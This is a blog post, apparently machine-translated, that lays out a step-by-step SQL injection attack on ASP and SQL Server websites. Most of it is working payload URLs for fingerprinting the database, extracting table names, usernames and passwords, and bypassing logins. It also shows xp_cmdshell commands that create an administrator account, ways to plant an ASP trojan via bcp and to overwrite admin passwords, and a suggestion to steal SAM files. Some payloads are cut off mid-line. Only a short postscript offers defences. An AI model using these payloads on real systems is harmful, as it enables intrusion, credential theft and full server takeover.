Java programmer from Dumb Bird to Rookie (101) SQL injection attack details (ii) detailed SQL injection process

in the previous blog we analyzed the principle of SQL injection, today we look at the overall process of SQL injection, that is, how to do SQL injection, because I have limited knowledge of database and network , this article is a large number of similar articles on the Internet Analysis and summary, which has a lot of direct reference, Refer to the article too much, do not pay attention to the source, please the original author forgive me)

The general idea of SQL injection attacks is:

1. Find the SQL injection location;
2. Determine the background database type;
3. Determination of xp_cmdshell Performance
4. Discovering the Web virtual directory
5. Upload ASP Trojan;
6. Get administrator privileges;

First, the SQL Injection vulnerability judgment

Generally speaking, SQL injection usually exists in the form of an ASP or Dynamic Web page with parameters such as HTTP://xxx.xxx.xxx/abc.asp?id=XX, sometimes there may be only one parameter in a Dynamic Web page, sometimes there may be n parameters, sometimes integer parameters, Sometimes it is a string parameter and cannot be generalize. In short, if it is a dynamic Web page with parameters and this page accesses the database, there is a possibility of SQL injection. If the programmer does not have security awareness and does not perform the necessary character filtering, there is a large likelihood of SQL injection.
In order to fully understand the Dynamic Web page answer information, preferred to adjust the configuration of IE. Put IE menu-tool-internet Option-advanced-Show friendly HTTP error message before the tick is removed.
In order to clarify the problem, the following is an example of HTTP://xxx.xxx.xxx/abc.asp?p=YY analysis, yy may be an integer, or it may be a string.

1, the parameters of the whole type of judgment
When the input parameter yy is an integral type, the SQL statement in abc.asp usually looks like this:
SELECT * from table name where field =yy, so you can use the following steps to test whether SQL injection exists.
①http://xxx.xxx.xxx/abc.asp?p=yy ' (append a single quotation mark), at this time ABC. The SQL statement in ASP becomes a
SELECT * from table name where Field =yy ', abc.asp run exception;
②http://xxx.xxx.xxx/abc.asp?p=yy and 1=1, abc.asp run normally, and the result is the same as the HTTP://xxx.xxx.xxx/abc.asp?p=YY operation;
③http://xxx.xxx.xxx/abc.asp?p=yy and 1=2, abc.asp run abnormally;
If the above three steps are fully satisfied, there must be a SQL injection vulnerability in abc.asp.

2. Handling of special cases
Sometimes an ASP programmer can filter out characters such as single quotes in a programmer to prevent SQL injection. Here are a few ways to try this.
①: Because VBS is not case-sensitive, programmers often filter either all uppercase strings or all lowercase strings, while mixed-case mixes tend to be overlooked. such as using Select instead of Select,select;
②unicode: In IIS, internationalization is done in the Unicode character set, and we can enter the strings entered in IE into Unicode strings. such as + =%2b, space =%20, etc. urlencode information see annex I;
③ascii Code method: The input part or all of the characters can be replaced with ASCII code, such as U=CHR, A=CHR (97), ASCII information, see attached two;

Ii. Differentiating database Server types

In general, access and Sql-server are the most common database servers, although they all support the T-SQL standard, but there are differences, and different databases have different methods of attack and must be treated differently.

1, using the database server system variables to differentiate
Sql-server has system variables such as User,db_name (), which can be used to determine not only sql-server but also a lot of useful information. Such as:
①http://xxx.xxx.xxx/abc.asp?p=yy and user>0 can not only determine whether it is sql-server, but also get the user name that is currently connected to the database
②http://xxx.xxx.xxx/abc.asp?p=yy&n db_name () >0 can not only determine whether it is sql-server, but also get the name of the database currently in use;
2. Using the system table
The system table for access is msysobjects and does not have access under the Web environment, while the sql-server system table is sysobjects and has access under the Web environment. For the following two statements:
①http://xxx.xxx.xxx/abc.asp?p=yy and (select COUNT (*) from sysobjects) >0
②http://xxx.xxx.xxx/abc.asp?p=yy and (select COUNT (*) from msysobjects) >0
If the database is Sql-serve, then the first one, abc.asp must be running normally, the second is an exception; if access is two, it will be abnormal.

3,  mssql three critical system tables
sysdatabases a row for each database on the system table:microsoft sql server . Initially installed  SQL Server ,sysdatabases  includes  master, model, msdb, mssqlweb , and  tempdb  The entry for the database. The table is only stored in the  master  database.   This table is saved in the master database, what information is stored in this table? This is very important. He is   saves all the library names, as well as the library ID and some related information.  
Here I will list the field names and related instructions that are useful to us. name //represents the name of the library. The
dbid //indicates that the id,dbid of the library is system from 1 to 5. These are the five libraries: master, model, msdb, Mssqlweb, tempdb . All the library names can be queried with select * from master.dbo.sysdatabases .

Each database in the

Sysobjects:sql-server has this system table, which holds all objects created within the database, such as constraints, defaults, logs, rules, stored procedures, and so on, with each object occupying one row in the table. The following is the field name and description for this system table.
Name,id,xtype,uid,status: Is the object name, object ID, Object type, owner object's user ID, object state, respectively. The
Object Type (xtype). Can be one of the following object types:
c = check  constraint  
d =  default value or  DEFAULT  constraint  
F  = FOREIGN KEY  constraint  
l =  log  
fn =  scalar function  
if  =  inline table function  
p =  stored procedure  
pk = primary key  constraint (type  k)  
rf =  Copy Filter stored procedure  
s =  system table  
tf =  table function  
tr =  Trigger  
u =  user table  
uq = unique  constraint (type is  k)  
v =  View  
x =  extended stored procedure  
when xtype= ' U '  and status>0 represents a table created by a user, the object name is the table name, and the object ID is the ID value of the table.
By:  select * from chouyfd.dbo.sysobjects where xtype= ' U '  and status >0  can list all the user-created table names in the library CHOUYFD.

syscolumns: Each column in each table and view occupies a row in the table, and each parameter in the stored procedure also occupies a row in the table. The table is located in each database. The main fields are:
Name, ID, colid: Is the field name, the table ID number, and the field ID number, where the ID is the ID number of the table we got with sysobjects.
With: SELECT * from ChouYFD.dbo.syscolumns where id=123456789 gets chouyfd the ID of the table is the list of all the fields in 123456789.

Iii. determination of the availability of xp_cmdshell

If the account currently connected to the data has SA permissions, and the Master.dbo.xp_cmdshell extended stored procedure (which calls the stored procedure can be directly used by the operating system shell) can be executed correctly, the entire computer can be fully controlled by the following methods, all future steps can be saved
1, HTTP://XXX.XXX.XXX/ABC.ASP?P=YY&NB ... er>0 Abc.asp performs an exception but can get the user name of the current connection database (if the dbo is displayed represents SA).
2, HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me () >0 Abc.asp performs an exception but can get the database name of the current connection.
3. HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec Master. xp_cmdshell "NET user aaa Bbb/add"--(master is the primary database of Sql-server; The semicolon in the name indicates the name of the statement sql-server before the semicolon is executed, continuing with the statement after it; "-" is an annotation, Indicates that everything behind it is only a comment, the system does not execute) can directly increase the operating system account AAA, the password is BBB.
4. HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec Master. xp_cmdshell "net localgroup Administrators Aaa/add"-adds the newly added account AAA to the Administrators group.
5. HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database name to disk= ' C:\inetpub\wwwroot\save.db ' will back up all the obtained data to the Web directory. Then use HTTP to download this file (of course preferred to know the Web virtual directory).
6. Create Unicode vulnerability by copying CMD
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe dbo.xp_cmdshell "Copy c:\winnt\system32\cmd.exe C:\inetpub\scripts\cmd.exe" Creates a Unicode vulnerability that, through the exploitation of this vulnerability, completes the control of the entire computer (preferably a Web virtual directory, of course).

Iv. Discovering Web virtual directories

Only the Web virtual directory can be found to determine the location of the ASP Trojan, and then get user permissions. Two methods are more effective.
One is based on experience to guess, in general, Web virtual directory is: C:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot, and executable virtual directory is: c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.
The second is to traverse the system directory structure, analyze the results and discover the Web virtual directory;
Create a temporary table first: Temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n MP (ID nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--
Next:
(1) We can use Xp_availablemedia to obtain all current drives and deposit them in the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
We can get a list of drives and related information by querying the contents of temp.
(2) We can use Xp_subdirs to get a list of subdirectories and deposit them in the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into Temp (i... dbo.xp_subdirs ' C: \ ';--
(3) We can also use Xp_dirtree to get the directory tree structure of all subdirectories and into the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID,NUM1) EXEC master.dbo.xp_dirtree ' C: \ ';--
This will allow you to successfully browse to the list of all directories (folders):

If we need to view the contents of a file, we can do this by executing Xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID) exec ... nbsp; ' Type c:\web\index.asp ';--
Use the ' BULK INSERT ' syntax to insert a text file into a temporary table. Example: BULK Insert temp (ID) from ' c:\inetpub\wwwroot\index.asp '
Browse temp to see the contents of the Index.asp file! Through the analysis of various ASP files, can get a lot of system information, Web construction and management information, even can get the SA account connection password.

Of course, if Xp_cmshell is able to execute, we can use it to complete:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID) &nbs ... cmdshell ' dir c: ';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID) &n ... p_cmdshell ' dir c: *.asp/s/a ';--

Through xp_cmdshell we can see all we want to see, including W3SVC
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID) Exec master.dbo.xp_cmdshe ... ub\adminscripts\adsutil.vbs enum W3SVC '

However, if it is not SA permission, we can also use the
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp (ID,NUM1) EXEC master.dbo.xp_dirtree ' C: \ ';--

Attention:
1. After each browsing, you should delete all content in temp, and delete the method:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2. The method of browsing the temp table is: (assuming TestDB is the database name of the current connection)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp; TESTDB.DBO.TEMP) >0 Gets the value of the first record ID field in table temp and compares it to an integer, obviously abc.asp work exception, but in the exception you can find the value of the ID field. Assuming that the table name found is XYZ, the
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ID from ... ere ID not in (' xyz ')) >0 gets the value of the second Record ID field in table temp.

V. Upload ASP Trojan

The so-called ASP Trojan, is a special function of the ASP code, and put into the Web virtual directory under the scripts, remote customers through IE can execute it, and then get the user rights of the system, to achieve the initial control of the system. There are two more effective ways to upload ASP Trojan:
1, the use of web remote management functions
Many web sites, for the convenience of maintenance, provide remote management capabilities, there are many Web sites, the content is different users have different access rights. In order to achieve the control of user rights, there is a Web page, requiring user name and password, only entered the correct value, in order to proceed to the next step, you can achieve the management of the web, such as uploading, downloading files, directory browsing, modification configuration.
Therefore, to obtain the correct user name and password, not only can upload ASP trojan, and sometimes even can directly get user permission to browse the system, the previous step of the "Discovery Web virtual directory" of the complex operation can be omitted.
The user name and password are usually stored in a single table, and finding the table and reading the contents of it solves the problem. Two effective methods are given below.
A, injection method:
Theoretically, the Certification Web page will have the type such as:
SELECT * from admin where username= ' XXX ' and password= ' YYY ' statements, if the necessary character filtering is not performed before this sentence is formally run, SQL injection is easy to implement.
As in the User Name text box, enter: ABC ' or 1=1--in the Password box input: 123 The SQL statement becomes:
SELECT * from admin where username= ' abc ' or 1=1 and password= ' 123 ' regardless of user input any user name and password, this statement will always be executed correctly, the user easily fooled the system, to obtain legal status.
B, guess the solution:
The basic idea is to guess the names of all the databases, guess each table name in the library, analyze the name of the table that holds the user name and password, guess each field name in the table, and guess the contents of each record in the table.
L Guess all database names
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 because The value for dbid is from 1 to 5, which is used by the system. So the user built it must have started from 6. And we submitted the name>1 (the Name field is a character type field and the number of errors will be error), abc.asp work exception, you can get the first database name, the same dbid respectively changed to 7,8,9,10,11,12 ... All database names can be obtained.
The following assumptions give the database name TestDB.

L GUESS the name of the user name table in the database
Guess solution: This method is based on individual experience to guess the name of the table, generally speaking, user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser, Systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts and so on. and judge by the statement
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select COUNT (*) from testdb.dbo. Table name) >0 If the table name exists, abc.asp works fine, otherwise it is abnormal. So loop until you guess the name of the System Account table.
Read method: Sql-server has a table sysobjects that holds the core information of the system, all the tables, views, etc. of a library are all stored in this table, and this table can be accessed through the web.
When the xtype= ' U ' and status>0 represent a table created by the user, and the tables and names created by each user are found and analyzed, the name of the user name table can be obtained, and the basic implementation method is:
①http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from TestD ... type= ' U ' and status>0) >0 get the first user to create a table name and enter Row comparisons, it is obvious that abc.asp is working abnormally, but the name of the table can be found in the exception. Assuming that the table name found is XYZ, the
②http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from testdb.dbo.sysobjects& ... tatus>0 and name not in (' XY Z ')) >0 can get the name of the table created by the second user, and the same name can be obtained for all tables created.
According to the name of the table, it is generally possible to determine that the table user holds the user name and password, the following assumes that this table is named Admin.
L GUESS the user Name field and Password fields name
Admin table must have a user name field, there must be a password fields, only to get the names of the two fields, it is possible to get the contents of the two fields. How to get their names, there are also the following two ways.
Guess solution: This method is based on individual experience to guess the field name, in general, the name of the user name fields commonly used: Username,name,user,account and so on. The name of the password field is commonly used: PASSWORD,PASS,PWD,PASSWD and so on. and judge by the statement
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count (field name) from TestDB.dbo.admin) >0 the "Select count (field name) from table name" statement to get the number of rows in the table, So if the field name exists, then abc.asp works fine, otherwise it is abnormal. So loop until you guess the names of the two fields.
Read method: The basic implementation method is
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (Select ... Me (object_id (' admin '), 1) from TestDB.dbo.sysobjects) >0. Select top 1 col_name (object_id (' admin '), 1) from TestDB.dbo.sysobjects is the first field name to get a known table name from sysobjects, and when compared to an integer, it is obvious that the abc.asp is working abnormally, but the name of the field can be found in the exception. The Col_name (object_id (' admin '), 1) of 1 in turn replaced by 2,3,4,5,6 ... You can get all the field names.
L Guess user name and password
The most common and effective way to guess the contents of a user name and password is:
ASCII code verbatim decoding method: Although this method is slower, it is certainly feasible. The basic idea is to guess the length of the field first, then guess the value of each bit in turn. Guess the user name and the way to guess the password, the following to guess the user name as an example to illustrate its process.
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select Top&n ... nbsp;from TestDB.dbo.admin) =x (x=1,2,3,4,5, ... n, Username is the name of the user name field, admin is the name of the table), if x is a value I and abc.asp is running normally, then I is the length of the first user name. such as: when the input
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select Top ... e) from TestDB.dbo.admin) = 8 o'clock abc.asp Normal, the length of the first user name is 8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ASCII (substring (username,m,1)) from TestDB.dbo.admin) =n ( The value of M is between 1 and the user name length obtained in the previous step, when m=1,2,3, ... Guesses separately,... The value of n is the ASCII value of 1~9, A~z, a~z, or any value between 1~128, and admin is the name of the System user Account table, and if n is a value I and abc.asp is running normally, then I corresponds to the ASCII code is the user name a certain value. such as: when the input
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ASCII (substring (username,3,1)) from TestDB.dbo.admin) = 80 o'clock abc.asp is functioning normally, the third digit of the user name is P (ASCII of P is 80);
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ASCII (substring (username,9,1)) from TestDB.dbo.admin) = 33 O'Clock Abc.asp is running normally, the 9th bit of user name is! (! ASCII is 80);
Once you have guessed your first username and password, you can guess all the other usernames and passwords. Note: Sometimes the resulting password may be encrypted by MD5, etc., and it needs to be de-keyed with special tools. or change their password first, after use, and then change back, see the following instructions.
Simple method: Guess user name with
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1), flag is a field in the admin table, username is the user name segment, At this time abc.asp work abnormally, but can get username value. With the same method, you can get a second user name, a third user, and so on until all the user names in the table.
Guess user password: HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select Top 1&AMP;NB ... B.dbo.admin where pwd>1), flag is a field in the admin table, and PWD is a password field, at which time abc.asp works abnormally, but can get the value of PWD. With the same method, you can get the password for the second user name, the password for the third user, and so on, until the password for all the users in the table. Passwords are sometimes encrypted by MD5 and can be changed by password.
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd= ' ... where username= ' www ';--( 1 The MD5 value is: Aaabbbcccdddeeef, that is, change the password to 1;www for the known user name)
In the same way, you can change the password to the original value.

2, using the table content to document the function
SQL has a bcp command that enables the contents of a table to be translated into a text file and placed in a specified location. With this feature, we can build a temporary table, and then enter an ASP Trojan in a row in the table, and then export the ASP file with the bcp command.
The command line format is as follows:
BCP "SELECT * from Text". Foo "queryout c:\inetpub\wwwroot\runcommand.asp–c–s localhost–u sa–p foobar (' S ' parameter is the server that executes the query, the ' U ' parameter is the user name, the ' P ' parameter is the password, Finally uploaded a runcommand.asp trojan)

Six, get the system administrator rights

ASP trojan only user permissions, to obtain full control of the system, but also to have the system administrator rights. What to do? There are many ways to elevate permissions:
Upload Trojan, modify the boot automatically run. ini file (It restarts, it is dead);
Replicate CMD.exe to scripts and artificially create Unicode vulnerabilities;
Download the Sam file, hack and get all user name passwords for the OS;
And so on, depending on the specific situation of the system, different methods can be taken.

Postscript

As described above, the vulnerability of SQL is very large, but I believe that many small and medium-sized sites in the country there are widespread such loopholes. Here are some personal not entirely recommended

1, the code to the input parameters to do sufficient filtering, and as far as possible to consider the extreme situation
2, the wrong information as little as possible, otherwise unrelated people can not understand and the heart of people will bring interest
3. Do not run the server process as an administrator
4. In some cases, the net command is a "Microsoft card" Trojan for attackers
5, strictly control the source of remote login visitors
6. If possible, it is not recommended to use Windows as the server operating system

Note : This article is only for the reader to learn, please do not do something in violation of the law, once it happened, and I have nothing to do

Java programmer from Dumb Bird to Rookie (101) SQL injection attack details (ii) detailed SQL injection process